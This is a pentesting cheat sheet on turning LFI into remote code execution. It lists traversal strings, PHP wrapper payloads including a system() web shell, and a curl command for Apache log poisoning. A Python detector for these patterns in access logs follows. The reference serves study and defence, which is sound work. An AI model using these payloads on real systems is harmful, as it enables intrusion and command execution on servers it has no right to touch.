LFI to RCE
Escalating LFI to remote code execution
File Inclusion
Interactive Mind Map
graph TD
A[LFI Found] --> B{Path to RCE}
B --> C[Log Poisoning]
B --> D[PHP Wrappers]
B --> E[Session Files]
B --> F["/proc/self/environ"]
C --> G[Poison Apache/SSH logs]
D --> H[data:// or expect://]
E --> I[PHP session serialization]
G --> J[Include poisoned log]
H --> J
I --> J
J --> K[RCE Achieved]
Quick Reference
LFI
/page?file=../../../../etc/passwd    # Basic directory traversal
/page?file=....//....//etc/passwd    # Bypass traversal filters
Wrappers
php://filter/convert.base64-encode/resource=index.php    # Read source code via base64 filter
data://text/plain,<?php system($_GET['cmd']);?>    # RCE via data wrapper
Log Poisoning
# Poison Apache log
curl -H "User-Agent: <?php system($_GET['cmd']);?>" URL    # Inject PHP into User-Agent
# Include log
/page?file=/var/log/apache2/access.log&cmd=id    # Include poisoned log file
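Detection
The quick-reference entries above all leave traces in the web server's access log. The following is an added example, not part of the original cheat sheet: a small classifier that flags those traces in Apache "combined" format lines. The rule names, the repeated percent-decoding (which goes beyond the cases listed above) and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format; group names are this example's own.
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
RULES = {
    "traversal": re.compile(r"\.\.+[/\\]"),  # ../ and the ....// variant
    "wrapper": re.compile(r"\b(?:php|data|expect)://", re.I),
    "sensitive_target": re.compile(r"/var/log/|/proc/self/environ|/etc/passwd"),
    "php_tag": re.compile(r"<\?(?:php|=)", re.I),
}

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is still inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the sorted names of the rules that fire on one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    target = fully_decode(m.group("target"))
    hits = {n for n in ("traversal", "wrapper", "sensitive_target")
            if RULES[n].search(target)}
    # A PHP tag in any logged client-controlled field means the log now holds code.
    fields = (target, m.group("referer"), fully_decode(m.group("agent")))
    if any(RULES["php_tag"].search(f) for f in fields):
        hits.add("php_tag")
    return sorted(hits)

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /page?file=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /page?file=....//....//etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /page?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[\'cmd\']);?>"',
    '203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /page?file=%2Fvar%2Flog%2Fapache2%2Faccess.log&cmd=id HTTP/1.1" 200 77120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line) or ["clean"], line[:70])
```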